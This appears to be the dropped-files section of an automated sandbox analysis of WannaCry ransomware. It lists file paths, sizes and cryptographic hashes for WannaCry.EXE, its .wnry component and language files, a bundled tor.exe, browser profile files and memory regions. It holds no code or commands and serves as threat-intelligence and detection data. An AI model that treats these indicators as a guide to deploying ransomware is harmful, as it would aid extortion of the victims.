2e7708646580b5aef9d626225f4a7f15f333db7259080b0c819643b6c71a48013d5bf36c2d08ee56a29923c9ce46576b62f5fd4b854ad11676d6abb84cc1ea26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
0b14038169c97d866b23783ddfe4b5b1

SHA1
d0bec10b4a344cbbc7bbb63cdd777c7b0f507a9e

SHA256
51de173e1ee5f16fbd0d29ec9ac6b1e26246965f64e61d0e251e2ee347f32485

SHA512
0e38baa7f63d9a2d6a88b5f8dc945417f47544b70400e3b7764fd90def5b98aa9d6845b8ccd5105acb35d0520988a7f8bdcbb7d1a46d6992cc25f268382f4c21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
cd939c13a4851d4cd5de44c3fcc47091

SHA1
9bac9b65839a19a00adbc216340eaaa7e2f1d7c6

SHA256
314decd1c380c41f4966062db9b8a85b9f87b99e408f73fb7e873ea7d8945641

SHA512
18122270fceb215bd1ba56dc2019c931d9b45ba69f712e06009481bab94c7ec7f7448962aa428ff87ae11414358fe0060854d6c06d4ae5db87982bcff7ffa9db

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1dd48af545440a4c435e6a9fcf20aa1c

SHA1
ddcd63fd3524f5f5ff3c49a26d1aafe66e30ca22

SHA256
ee1b9b4df74b5fe1162e0ff5b7119eb413991b03c7ee1a49cab38500a95c52c2

SHA512
04a73f375ff2e590f95a33a042c6018ae5f35521702213accd03faecde5d43214d4c40020bd2270ea94720e0bab0601bee6ae6625792f454c39a4e1a191a208e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
4ae64cb1852984b491b8407b98cae1a6

SHA1
fd70adcd4ed21c1a7680ff03d7373d90fa4019f8

SHA256
53bd50e78fde1f904cae763cbb82872cf1a97ba36da3398a360612b646489e0a

SHA512
24f907d2126552262edae135805df5ca698e33e42699c0db0ff569001d3a9eff4d8f50647f363d70eaae51e69845d5dbb31aa8e5fe8dc755d8d99d7c4a087c10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
8f6296f87e8223dd8cb1b702b73c30f2

SHA1
f9b13aeba4ee0a4a345f36565af113fff9068f35

SHA256
40015fe8bcd7c6f53387bcdf74a353d82de1326966cfe45dea37bb2ba700e6c8

SHA512
5a6f64aaae8a3441719d77b5392a655904fc8781ad6e4bce17f1a7294be22d2cb9032fac7dd161446a64b6c7b0eee5197f09099d656c34ce924ddea12bbe8c6c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe588be0.TMP

Filesize
1KB

MD5
6d381e783d55f5cafbefe462fe02fdb8

SHA1
f1bf40bef9e0bc7261c75642bceb645cf5b94d35

SHA256
3269eeb38faeb8c5bb15a0caf22efa37979c512e79527df05d6ff106c982733e

SHA512
4179a04aabbccd1f95658405aadd3eae920b0440d72ccb5ff22e2653627b5503812e0b43b8e3f8fb9818888e901fe586ad864e9228a3587e1c9b39673ec8540f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\cdb15b78-066b-4832-8ae4-fa18c25a4206.tmp

Filesize
7KB

MD5
0f8e7d54939451f8ddafb43b0e0e127e

SHA1
2956c2c0b610ff100b8222b8831ca1e5adacb5f4

SHA256
bde54bbbf130abd6fa5fe23fccd0b42166370e5acb28abab801c3eb8643321e3

SHA512
1a4dd769ae45fc6018741fe5e7f7eb26b5189c53e91213216f4c63c52c2db841e5803b89c48b38d1968f691da1cc617b03f57e49fc927a28c076d3e036029ffd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\d8e2094c-fc97-4f65-ba88-547c141864a3.tmp

Filesize
5KB

MD5
a5bd111b1199a29d10bde5697e30f6ac

SHA1
e4d0db8393f0a09e5ff65c899f61490ea26d328b

SHA256
c5973c8bf105faff323b13a1eae5d3385e7a7f1387e9b2815b67a60ab1b4f310

SHA512
6919d8aa8f8632df2efb349c9e58dd36f2df3891c52ae690a3f5ddce7cbc90a7ac1d6ac90e89cb6e0aa5dd0233be2f379c47e0f8dcb89e3c9e4e07e6679d7e6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
938b4790922ad8763d82be2ae1f618e4

SHA1
bda582e073be317e39ac4ec27d1deaf96f9e7bbf

SHA256
9bc5149314e4e3e92273e9263db88497ad160791d2db72b4a7e5a107b092f203

SHA512
fade6888e6791c6915d69abb47de8d62d5cdab2bb747366f9505559a5e7cf9f2169138c49e48bfbf4fc95bc264593df25d7b7fa52d2914f01432ea32058f36e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a7d92def3843b7622611d7e8ad03c779

SHA1
66a23ea27540a9d8c73c7a778090887730c4b0d7

SHA256
64df64e3e0c3301d1964e73a796d521974f8813559fe68d1bf36be5463bcbd4a

SHA512
5351bd25adad6bb52f6869c235974bda03cfb3ca3e0ac7d25b02fbb7df5e34d868e5e49ae62bc9c5985327d19e456de570f44f86b78215fd0376cd72a06e5977

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a07c376e948353a20ab3c8ab4e1bc1a9

SHA1
e87aedba05154ada2af6978026a300d61ff473fc

SHA256
0fc3787dd45aa139393e70c2859021d6ec4ea7078e10debfa3a34c16f494cea8

SHA512
7dc6899c3a5a631630aaf58846e7f11d3dfa90ceaa0cf8edad04e6d4c85e28e4bfcc334313b80a062afa7a615ef06020c1e06edae8dd09c87344a6b4d1386b3c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
49afde8eaae980d9515efc9a78262a42

SHA1
a369d8de662c68c84286671a4eb5d0911bae7f46

SHA256
2edcdc2ffb7d2850d83b6968c56ed9cb524e37624735126064b5a1d5dcb8fc2a

SHA512
1fa4babe57c605d272b31b5afd1418222c31f5633f80d46a374ee4501ad17b52fcb05b8d4b0c65223d1cd507336308e671fa0cd0de6f8490e8ea04f60e8f4121

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b642fcbd5a727914baf9be6102327120

SHA1
3a788f9683659b697ac205c79bf863e5492badfd

SHA256
b67528ca6ccdc248185111e6e5d38e94878b8b6a9a0c71764f32b70d5605a1d8

SHA512
097d914caffe4055ba8ccd08c3d6293cca38dc0be2e85b058763d745ea47c95db842a4fe4c8cb9c5f4f805eff31d9a9136cf8ddf6f180905c393f1e4c7deaab7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
bcc285957156a8f00772de018ad7cd18

SHA1
da42b7bdfc6b00077ff4d2b30f0c042ed561fb7b

SHA256
4810af6e2967c39c7f7b6cf65225f91c8f6e260d3fb24c528de8f40496be3416

SHA512
eaa930aa16b84a4ed82803c40d397e3c04991a5688d4b03f785b35d3bdcf56bcc11bedc08526aa3f54db997570eda9c7e4dd3d4219d6db70e25d3660b03ad441

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d100c98e88a811bfd706d9b0cc09a86f

SHA1
8c412403724f0135164651412c295672281591c7

SHA256
b1761882e7fc8b9bbf94988f72c1724050b2f4c5ffb4595e8e6920e2f61aaef5

SHA512
5f23572e3491671d95d8da931b4a68b4f8d30f69567e388b80e027a0bc48e99db6479543dd310ff362cffa3f04abf0e17a4d3e5fa6a3ac173eec90c120ebc43e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
9d99cc2308eb0762faa3218b03f177cb

SHA1
fd70c15e4a9d05acfb123bbf3f582cc2807f8d79

SHA256
9b50507197a50818e4f03a65a8b8893af16f518551fa651a1c35d32926bfac71

SHA512
cc957066b13d57ff2ffa4d7730f4c4f142952d21da140f0ccfdfd73a4329cb9d50c4c16398198d1c33747b660577ed0e6a79636d21591b83b5cffd65d36c8e0d

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\82fe5496-a770-46d0-8bdc-d25a12cc722e.down_data

Filesize
555KB

MD5
5683c0028832cae4ef93ca39c8ac5029

SHA1
248755e4e1db552e0b6f8651b04ca6d1b31a86fb

SHA256
855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

SHA512
aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
18ebbe9c5b9d1f57828cb23f70ee4358

SHA1
3bffe5a39ea4b5dff89e2e051911dc366d6d517f

SHA256
32feacc1e37265de0ea41d7113a91ec4ea7a697d92941d747adf814039111df7

SHA512
99ea34ce3b016720a2c5d651e68eb4bca122f8cd05d9b18e4e0225b836a576517a691914c00472977570a24a9360a2049d7150d8392abbab76cd5a3d6e3fa01e

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
ad7a569bafd3a938fe348f531b8ef332

SHA1
7fdd2f52d07640047bb62e0f3d3c946ddd85c227

SHA256
f0e06109256d5577e9f62db2c398974c5002bd6d08892f20517760601b705309

SHA512
b762bae338690082d817b3008144926498a1bd2d6d99be33e513c43515808f9a3184bd10254e5c6a1ff90a9211653f066050249030ad9fe0460ec88335b3d423

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
5.8MB

MD5
0bce18f650a29a0671e42747ca984a37

SHA1
7249cc3578cb4ed6207e085f366feb4610f5a8c9

SHA256
a4aca2b371e81bf1498badd19fe315d4181772cbbfe229d106492b980e1fd7ea

SHA512
5161c9ea79399af85876008800335005c95adfb9510687ab61f4905cbc80df6f8d7e6da423d671c708e2d6e68e83a4bddff5cdbc40c17cf00efce9ce3cafad32

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
933B

MD5
7a2726bb6e6a79fb1d092b7f2b688af0

SHA1
b3effadce8b76aee8cd6ce2eccbb8701797468a2

SHA256
840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5

SHA512
4e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54

Download Submit
C:\Users\Admin\Downloads\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\MLG.md:Zone.Identifier

Filesize
55B

MD5
0f98a5550abe0fb880568b1480c96a1c

SHA1
d2ce9f7057b201d31f79f3aee2225d89f36be07d

SHA256
2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1

SHA512
dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

Download Submit
C:\Users\Admin\Downloads\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 195309.crdownload

Filesize
10.9MB

MD5
7c7fb86210ab287c5b1b8da0e493818e

SHA1
fd0c9501f63ab40ad21b18f744c0ab126407b305

SHA256
adad0eaee2468fbff99e0089b10b1afec28044a67c100bc70c90f24782a778fe

SHA512
d5e19368b06b73700e1f5b1bbd962ee5ef0293c8eea6f70ef2fe38681c2101f22b5ef6ad42208a0a1439e0435dd830cd94f673cb1756f0a078a181d94e7ec90b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 919508.crdownload

Filesize
9KB

MD5
f7349874043c175bee2d0ff66438cbf0

SHA1
da371495289e25e92ad5d73dff6f29beea422427

SHA256
f852b9baeeefde61a20e5de4751b978594a9bf3b34514bc652d01224ee76da1b

SHA512
878f4bc1ab1b84b993725bcf2e98b1b9dcb72f75a20e34287d13016cc72f1df0334ac630aa8604a3d25b9569be2541c8f18f4f644f5f31ff31dd2d3fedd6d1ad

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE

Filesize
3.4MB

MD5
84c82835a5d21bbcf75a61706d8ab549

SHA1
5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

SHA256
ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

SHA512
90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

Download Submit
C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\b.wnry

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
C:\Users\Admin\Downloads\c.wnry

Filesize
780B

MD5
8124a611153cd3aceb85a7ac58eaa25d

SHA1
c1d5cd8774261d810dca9b6a8e478d01cd4995d6

SHA256
0ceb451c1dbefaa8231eeb462e8ce639863eb5b8ae4fa63a353eb6e86173119e

SHA512
b9c8dfb5d58c95628528cc729d2394367c5e205328645ca6ef78a3552d9ad9f824ae20611a43a6e01daaffeffdc9094f80d772620c731e4192eb0835b8ed0f17

Download Submit
C:\Users\Admin\Downloads\msg\m_bulgarian.wnry

Filesize
46KB

MD5
95673b0f968c0f55b32204361940d184

SHA1
81e427d15a1a826b93e91c3d2fa65221c8ca9cff

SHA256
40b37e7b80cf678d7dd302aaf41b88135ade6ddf44d89bdba19cf171564444bd

SHA512
7601f1883edbb4150a9dc17084012323b3bfa66f6d19d3d0355cf82b6a1c9dce475d758da18b6d17a8b321bf6fca20915224dbaedcb3f4d16abfaf7a5fc21b92

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (simplified).wnry

Filesize
53KB

MD5
0252d45ca21c8e43c9742285c48e91ad

SHA1
5c14551d2736eef3a1c1970cc492206e531703c1

SHA256
845d0e178aeebd6c7e2a2e9697b2bf6cf02028c50c288b3ba88fe2918ea2834a

SHA512
1bfcf6c0e7c977d777f12bd20ac347630999c4d99bd706b40de7ff8f2f52e02560d68093142cc93722095657807a1480ce3fb6a2e000c488550548c497998755

Download Submit
C:\Users\Admin\Downloads\msg\m_chinese (traditional).wnry

Filesize
77KB

MD5
2efc3690d67cd073a9406a25005f7cea

SHA1
52c07f98870eabace6ec370b7eb562751e8067e9

SHA256
5c7f6ad1ec4bc2c8e2c9c126633215daba7de731ac8b12be10ca157417c97f3a

SHA512
0766c58e64d9cda5328e00b86f8482316e944aa2c26523a3c37289e22c34be4b70937033bebdb217f675e40db9fecdce0a0d516f9065a170e28286c2d218487c

Download Submit
C:\Users\Admin\Downloads\msg\m_croatian.wnry

Filesize
38KB

MD5
17194003fa70ce477326ce2f6deeb270

SHA1
e325988f68d327743926ea317abb9882f347fa73

SHA256
3f33734b2d34cce83936ce99c3494cd845f1d2c02d7f6da31d42dfc1ca15a171

SHA512
dcf4ccf0b352a8b271827b3b8e181f7d6502ca0f8c9dda3dc6e53441bb4ae6e77b49c9c947cc3ede0bf323f09140a0c068a907f3c23ea2a8495d1ad96820051c

Download Submit
C:\Users\Admin\Downloads\msg\m_czech.wnry

Filesize
39KB

MD5
537efeecdfa94cc421e58fd82a58ba9e

SHA1
3609456e16bc16ba447979f3aa69221290ec17d0

SHA256
5afa4753afa048c6d6c39327ce674f27f5f6e5d3f2a060b7a8aed61725481150

SHA512
e007786ffa09ccd5a24e5c6504c8de444929a2faaafad3712367c05615b7e1b0fbf7fbfff7028ed3f832ce226957390d8bf54308870e9ed597948a838da1137b

Download Submit
C:\Users\Admin\Downloads\msg\m_danish.wnry

Filesize
36KB

MD5
2c5a3b81d5c4715b7bea01033367fcb5

SHA1
b548b45da8463e17199daafd34c23591f94e82cd

SHA256
a75bb44284b9db8d702692f84909a7e23f21141866adf3db888042e9109a1cb6

SHA512
490c5a892fac801b853c348477b1140755d4c53ca05726ac19d3649af4285c93523393a3667e209c71c80ac06ffd809f62dd69ae65012dcb00445d032f1277b3

Download Submit
C:\Users\Admin\Downloads\msg\m_dutch.wnry

Filesize
36KB

MD5
7a8d499407c6a647c03c4471a67eaad7

SHA1
d573b6ac8e7e04a05cbbd6b7f6a9842f371d343b

SHA256
2c95bef914da6c50d7bdedec601e589fbb4fda24c4863a7260f4f72bd025799c

SHA512
608ef3ff0a517fe1e70ff41aeb277821565c5a9bee5103aa5e45c68d4763fce507c2a34d810f4cd242d163181f8341d9a69e93fe32aded6fbc7f544c55743f12

Download Submit
C:\Users\Admin\Downloads\msg\m_english.wnry

Filesize
36KB

MD5
fe68c2dc0d2419b38f44d83f2fcf232e

SHA1
6c6e49949957215aa2f3dfb72207d249adf36283

SHA256
26fd072fda6e12f8c2d3292086ef0390785efa2c556e2a88bd4673102af703e5

SHA512
941fa0a1f6a5756ed54260994db6158a7ebeb9e18b5c8ca2f6530c579bc4455918df0b38c609f501ca466b3cc067b40e4b861ad6513373b483b36338ae20a810

Download Submit
C:\Users\Admin\Downloads\msg\m_filipino.wnry

Filesize
36KB

MD5
08b9e69b57e4c9b966664f8e1c27ab09

SHA1
2da1025bbbfb3cd308070765fc0893a48e5a85fa

SHA256
d8489f8c16318e524b45de8b35d7e2c3cd8ed4821c136f12f5ef3c9fc3321324

SHA512
966b5ed68be6b5ccd46e0de1fa868cfe5432d9bf82e1e2f6eb99b2aef3c92f88d96f4f4eec5e16381b9c6db80a68071e7124ca1474d664bdd77e1817ec600cb4

Download Submit
C:\Users\Admin\Downloads\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Admin\Downloads\msg\m_french.wnry

Filesize
37KB

MD5
4e57113a6bf6b88fdd32782a4a381274

SHA1
0fccbc91f0f94453d91670c6794f71348711061d

SHA256
9bd38110e6523547aed50617ddc77d0920d408faeed2b7a21ab163fda22177bc

SHA512
4f1918a12269c654d44e9d394bc209ef0bc32242be8833a2fba437b879125177e149f56f2fb0c302330dec328139b34982c04b3fefb045612b6cc9f83ec85aa9

Download Submit
C:\Users\Admin\Downloads\msg\m_german.wnry

Filesize
36KB

MD5
3d59bbb5553fe03a89f817819540f469

SHA1
26781d4b06ff704800b463d0f1fca3afd923a9fe

SHA256
2adc900fafa9938d85ce53cb793271f37af40cf499bcc454f44975db533f0b61

SHA512
95719ae80589f71209bb3cb953276538040e7111b994d757b0a24283aefe27aadbbe9eef3f1f823ce4cabc1090946d4a2a558607ac6cac6faca5971529b34dac

Download Submit
C:\Users\Admin\Downloads\msg\m_greek.wnry

Filesize
47KB

MD5
fb4e8718fea95bb7479727fde80cb424

SHA1
1088c7653cba385fe994e9ae34a6595898f20aeb

SHA256
e13cc9b13aa5074dc45d50379eceb17ee39a0c2531ab617d93800fe236758ca9

SHA512
24db377af1569e4e2b2ebccec42564cea95a30f1ff43bcaf25a692f99567e027bcef4aacef008ec5f64ea2eef0c04be88d2b30bcadabb3919b5f45a6633940cb

Download Submit
C:\Users\Admin\Downloads\msg\m_indonesian.wnry

Filesize
36KB

MD5
3788f91c694dfc48e12417ce93356b0f

SHA1
eb3b87f7f654b604daf3484da9e02ca6c4ea98b7

SHA256
23e5e738aad10fb8ef89aa0285269aff728070080158fd3e7792fe9ed47c51f4

SHA512
b7dd9e6dc7c2d023ff958caf132f0544c76fae3b2d8e49753257676cc541735807b4befdf483bcae94c2dcde3c878c783b4a89dca0fecbc78f5bbf7c356f35cd

Download Submit
C:\Users\Admin\Downloads\msg\m_italian.wnry

Filesize
36KB

MD5
30a200f78498990095b36f574b6e8690

SHA1
c4b1b3c087bd12b063e98bca464cd05f3f7b7882

SHA256
49f2c739e7d9745c0834dc817a71bf6676ccc24a4c28dcddf8844093aab3df07

SHA512
c0da2aae82c397f6943a0a7b838f60eeef8f57192c5f498f2ecf05db824cfeb6d6ca830bf3715da7ee400aa8362bd64dc835298f3f0085ae7a744e6e6c690511

Download Submit
C:\Users\Admin\Downloads\msg\m_japanese.wnry

Filesize
79KB

MD5
b77e1221f7ecd0b5d696cb66cda1609e

SHA1
51eb7a254a33d05edf188ded653005dc82de8a46

SHA256
7e491e7b48d6e34f916624c1cda9f024e86fcbec56acda35e27fa99d530d017e

SHA512
f435fd67954787e6b87460db026759410fbd25b2f6ea758118749c113a50192446861a114358443a129be817020b50f21d27b1ebd3d22c7be62082e8b45223fc

Download Submit
C:\Users\Admin\Downloads\msg\m_korean.wnry

Filesize
89KB

MD5
6735cb43fe44832b061eeb3f5956b099

SHA1
d636daf64d524f81367ea92fdafa3726c909bee1

SHA256
552aa0f82f37c9601114974228d4fc54f7434fe3ae7a276ef1ae98a0f608f1d0

SHA512
60272801909dbba21578b22c49f6b0ba8cd0070f116476ff35b3ac8347b987790e4cc0334724244c4b13415a246e77a577230029e4561ae6f04a598c3f536c7e

Download Submit
C:\Users\Admin\Downloads\msg\m_latvian.wnry

Filesize
40KB

MD5
c33afb4ecc04ee1bcc6975bea49abe40

SHA1
fbea4f170507cde02b839527ef50b7ec74b4821f

SHA256
a0356696877f2d94d645ae2df6ce6b370bd5c0d6db3d36def44e714525de0536

SHA512
0d435f0836f61a5ff55b78c02fa47b191e5807a79d8a6e991f3115743df2141b3db42ba8bdad9ad259e12f5800828e9e72d7c94a6a5259312a447d669b03ec44

Download Submit
C:\Users\Admin\Downloads\msg\m_norwegian.wnry

Filesize
36KB

MD5
ff70cc7c00951084175d12128ce02399

SHA1
75ad3b1ad4fb14813882d88e952208c648f1fd18

SHA256
cb5da96b3dfcf4394713623dbf3831b2a0b8be63987f563e1c32edeb74cb6c3a

SHA512
f01df3256d49325e5ec49fd265aa3f176020c8ffec60eb1d828c75a3fa18ff8634e1de824d77dfdd833768acff1f547303104620c70066a2708654a07ef22e19

Download Submit
C:\Users\Admin\Downloads\msg\m_polish.wnry

Filesize
38KB

MD5
e79d7f2833a9c2e2553c7fe04a1b63f4

SHA1
3d9f56d2381b8fe16042aa7c4feb1b33f2baebff

SHA256
519ad66009a6c127400c6c09e079903223bd82ecc18ad71b8e5cd79f5f9c053e

SHA512
e0159c753491cac7606a7250f332e87bc6b14876bc7a1cf5625fa56ab4f09c485f7b231dd52e4ff0f5f3c29862afb1124c0efd0741613eb97a83cbe2668af5de

Download Submit
C:\Users\Admin\Downloads\msg\m_portuguese.wnry

Filesize
37KB

MD5
fa948f7d8dfb21ceddd6794f2d56b44f

SHA1
ca915fbe020caa88dd776d89632d7866f660fc7a

SHA256
bd9f4b3aedf4f81f37ec0a028aabcb0e9a900e6b4de04e9271c8db81432e2a66

SHA512
0d211bfb0ae953081dca00cd07f8c908c174fd6c47a8001fadc614203f0e55d9fbb7fa9b87c735d57101341ab36af443918ee00737ed4c19ace0a2b85497f41a

Download Submit
memory/692-739-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/1164-2800-0x00007FF6D7FB0000-0x00007FF6D7FBC000-memory.dmp

Filesize
48KB

Download
memory/1164-2804-0x00007FF6D7FB0000-0x00007FF6D7FBC000-memory.dmp

Filesize
48KB

Download
memory/4328-2093-0x0000000073F40000-0x0000000073FC2000-memory.dmp

Filesize
520KB

Download
memory/4328-2094-0x0000000073F10000-0x0000000073F32000-memory.dmp

Filesize
136KB

Download
memory/4328-2107-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2100-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2091-0x0000000074060000-0x000000007407C000-memory.dmp

Filesize
112KB

Download
memory/4328-2092-0x0000000073FD0000-0x0000000074052000-memory.dmp

Filesize
520KB

Download
memory/4328-2124-0x0000000073C70000-0x0000000073E8C000-memory.dmp

Filesize
2.1MB

Download
memory/4328-2125-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2175-0x0000000073C70000-0x0000000073E8C000-memory.dmp

Filesize
2.1MB

Download
memory/4328-2118-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2095-0x0000000073E90000-0x0000000073F07000-memory.dmp

Filesize
476KB

Download
memory/4328-2096-0x0000000073C70000-0x0000000073E8C000-memory.dmp

Filesize
2.1MB

Download
memory/4328-2090-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2035-0x0000000073F40000-0x0000000073FC2000-memory.dmp

Filesize
520KB

Download
memory/4328-2036-0x0000000073F10000-0x0000000073F32000-memory.dmp

Filesize
136KB

Download
memory/4328-2037-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2034-0x0000000073C70000-0x0000000073E8C000-memory.dmp

Filesize
2.1MB

Download
memory/4328-2033-0x0000000073FD0000-0x0000000074052000-memory.dmp

Filesize
520KB

Download
memory/4328-2161-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download
memory/4328-2169-0x0000000000180000-0x000000000047E000-memory.dmp

Filesize
3.0MB

Download